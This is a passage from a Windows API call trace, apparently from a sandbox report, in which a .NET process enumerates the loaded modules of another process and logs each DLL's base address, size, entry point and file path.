lpmodinfo=0x2370448*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0141.758] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.758] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0141.759] CoTaskMemFree (pv=0x55ab38) [0141.759] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.759] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0141.760] CoTaskMemFree (pv=0x55ab38) [0141.760] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x2372554, cb=0xc | out: lpmodinfo=0x2372554*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0141.760] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.760] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0141.761] CoTaskMemFree (pv=0x55ab38) [0141.761] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.761] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0141.762] CoTaskMemFree (pv=0x55ab38) [0141.762] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x2374710, cb=0xc | out: lpmodinfo=0x2374710*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0141.763] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.763] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0141.764] CoTaskMemFree (pv=0x55ab38) [0141.764] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.764] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0141.765] CoTaskMemFree (pv=0x55ab38) [0141.765] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x2376900, cb=0xc | out: lpmodinfo=0x2376900*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0141.766] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.766] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0141.767] CoTaskMemFree (pv=0x55ab38) [0141.767] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.767] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0141.768] CoTaskMemFree (pv=0x55ab38) [0141.768] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x2378ab4, cb=0xc | out: lpmodinfo=0x2378ab4*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0141.769] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.769] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0141.770] CoTaskMemFree (pv=0x55ab38) [0141.770] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.770] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0141.771] CoTaskMemFree (pv=0x55ab38) [0141.771] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x237abb8, cb=0xc | out: lpmodinfo=0x237abb8*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0141.771] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.771] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0141.772] CoTaskMemFree (pv=0x55ab38) [0141.772] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.772] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0141.773] CoTaskMemFree (pv=0x55ab38) [0141.773] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x237cccc, cb=0xc | out: lpmodinfo=0x237cccc*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0141.774] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.774] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0141.775] CoTaskMemFree (pv=0x55ab38) [0141.775] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.775] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0141.777] CoTaskMemFree (pv=0x55ab38) [0141.777] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x237edd8, cb=0xc | out: lpmodinfo=0x237edd8*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0141.778] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.778] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0141.779] CoTaskMemFree (pv=0x55ab38) [0141.779] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.779] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0141.779] CoTaskMemFree (pv=0x55ab38) [0141.779] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x2380ee4, cb=0xc | out: lpmodinfo=0x2380ee4*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0141.780] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.780] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0141.781] CoTaskMemFree (pv=0x55ab38) [0141.781] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.781] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0141.782] CoTaskMemFree (pv=0x55ab38) [0141.782] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x2382ff0, cb=0xc | out: lpmodinfo=0x2382ff0*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0141.783] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.783] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0141.784] CoTaskMemFree (pv=0x55ab38) [0141.784] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.784] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0141.785] CoTaskMemFree (pv=0x55ab38) [0141.785] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x23850fc, cb=0xc | out: lpmodinfo=0x23850fc*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0141.786] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.786] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0141.787] CoTaskMemFree (pv=0x55ab38) [0141.787] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.787] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0141.788] CoTaskMemFree (pv=0x55ab38) [0141.788] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x2387208, cb=0xc | out: lpmodinfo=0x2387208*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0141.789] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.789] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0141.790] CoTaskMemFree (pv=0x55ab38) [0141.790] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.790] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0141.793] CoTaskMemFree (pv=0x55ab38) [0141.793] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x2389354, cb=0xc | out: lpmodinfo=0x2389354*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0141.794] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.794] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0141.795] CoTaskMemFree (pv=0x55ab38) [0141.795] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.795] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0141.796] CoTaskMemFree (pv=0x55ab38) [0141.796] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x238b468, cb=0xc | out: lpmodinfo=0x238b468*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0141.797] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.797] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0141.798] CoTaskMemFree (pv=0x55ab38) [0141.798] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.798] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0141.799] CoTaskMemFree (pv=0x55ab38) [0141.799] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x238d564, cb=0xc | out: lpmodinfo=0x238d564*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0141.800] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.800] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0141.801] CoTaskMemFree (pv=0x55ab38) [0141.801] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.801] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0141.802] CoTaskMemFree (pv=0x55ab38) [0141.803] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x238f678, cb=0xc | out: lpmodinfo=0x238f678*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0141.803] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.803] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0141.804] CoTaskMemFree (pv=0x55ab38) [0141.804] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.804] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0141.805] CoTaskMemFree (pv=0x55ab38) [0141.805] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x239178c, cb=0xc | out: lpmodinfo=0x239178c*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0141.808] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.808] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0141.809] CoTaskMemFree (pv=0x55ab38) [0141.809] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.809] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0141.810] CoTaskMemFree (pv=0x55ab38) [0141.810] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x2393898, cb=0xc | out: lpmodinfo=0x2393898*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0141.811] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.811] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0141.812] CoTaskMemFree (pv=0x55ab38) [0141.812] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.812] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0141.814] CoTaskMemFree (pv=0x55ab38) [0141.814] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x23959ac, cb=0xc | out: lpmodinfo=0x23959ac*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0141.815] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.815] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0141.816] CoTaskMemFree (pv=0x55ab38) [0141.816] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.816] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0141.817] CoTaskMemFree (pv=0x55ab38) [0141.817] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x2397ad8, cb=0xc | out: lpmodinfo=0x2397ad8*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0141.819] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.819] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0141.820] CoTaskMemFree (pv=0x55ab38) [0141.820] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.820] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0141.821] CoTaskMemFree (pv=0x55ab38) [0141.821] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x2399be4, cb=0xc | out: lpmodinfo=0x2399be4*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0141.823] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.823] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0141.824] CoTaskMemFree (pv=0x55ab38) [0141.824] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.825] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0141.826] CoTaskMemFree (pv=0x55ab38) [0141.826] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x239bcf8, cb=0xc | out: lpmodinfo=0x239bcf8*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0141.827] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.827] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0141.828] CoTaskMemFree (pv=0x55ab38) [0141.828] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.828] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0141.829] CoTaskMemFree (pv=0x55ab38) [0141.829] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x239de04, cb=0xc | out: lpmodinfo=0x239de04*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0141.830] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.830] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0141.831] CoTaskMemFree (pv=0x55ab38) [0141.831] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.831] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0141.832] CoTaskMemFree (pv=0x55ab38) [0141.833] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x239ff10, cb=0xc | out: lpmodinfo=0x239ff10*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0141.834] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.834] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0141.835] CoTaskMemFree (pv=0x55ab38) [0141.835] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.835] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0141.836] CoTaskMemFree (pv=0x55ab38) [0141.836] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x23a201c, cb=0xc | out: lpmodinfo=0x23a201c*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0141.837] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.837] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0141.840] CoTaskMemFree (pv=0x55ab38) [0141.840] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.840] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0141.841] CoTaskMemFree (pv=0x55ab38) [0141.841] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x23a4130, cb=0xc | out: lpmodinfo=0x23a4130*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0141.842] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.842] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0141.843] CoTaskMemFree (pv=0x55ab38) [0141.843] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.843] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0141.845] CoTaskMemFree (pv=0x55ab38) [0141.845] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x23a6244, cb=0xc | out: lpmodinfo=0x23a6244*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0141.846] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.846] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0141.847] CoTaskMemFree (pv=0x55ab38) [0141.847] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.847] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0141.848] CoTaskMemFree (pv=0x55ab38) [0141.848] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x23a8350, cb=0xc | out: lpmodinfo=0x23a8350*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0141.849] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.849] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0141.850] CoTaskMemFree (pv=0x55ab38) [0141.851] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.851] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0141.852] CoTaskMemFree (pv=0x55ab38) [0141.852] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x23aa45c, cb=0xc | out: lpmodinfo=0x23aa45c*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0141.853] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.853] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0141.854] CoTaskMemFree (pv=0x55ab38) [0141.855] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.855] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0141.856] CoTaskMemFree (pv=0x55ab38) [0141.856] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x23ac570, cb=0xc | out: lpmodinfo=0x23ac570*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0141.857] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.857] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0141.858] CoTaskMemFree (pv=0x55ab38) [0141.858] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.858] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0141.859] CoTaskMemFree (pv=0x55ab38) [0141.859] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x23ae67c, cb=0xc | out: lpmodinfo=0x23ae67c*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0141.861] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.861] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55ab38, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0141.862] CoTaskMemFree (pv=0x55ab38) [0141.862] CoTaskMemAlloc (cb=0x804) returned 0x55ab38 [0141.862] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55ab38, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0141.863] CoTaskMemFree (pv=0x55ab38) [0141.863] GetModuleInformation (in: 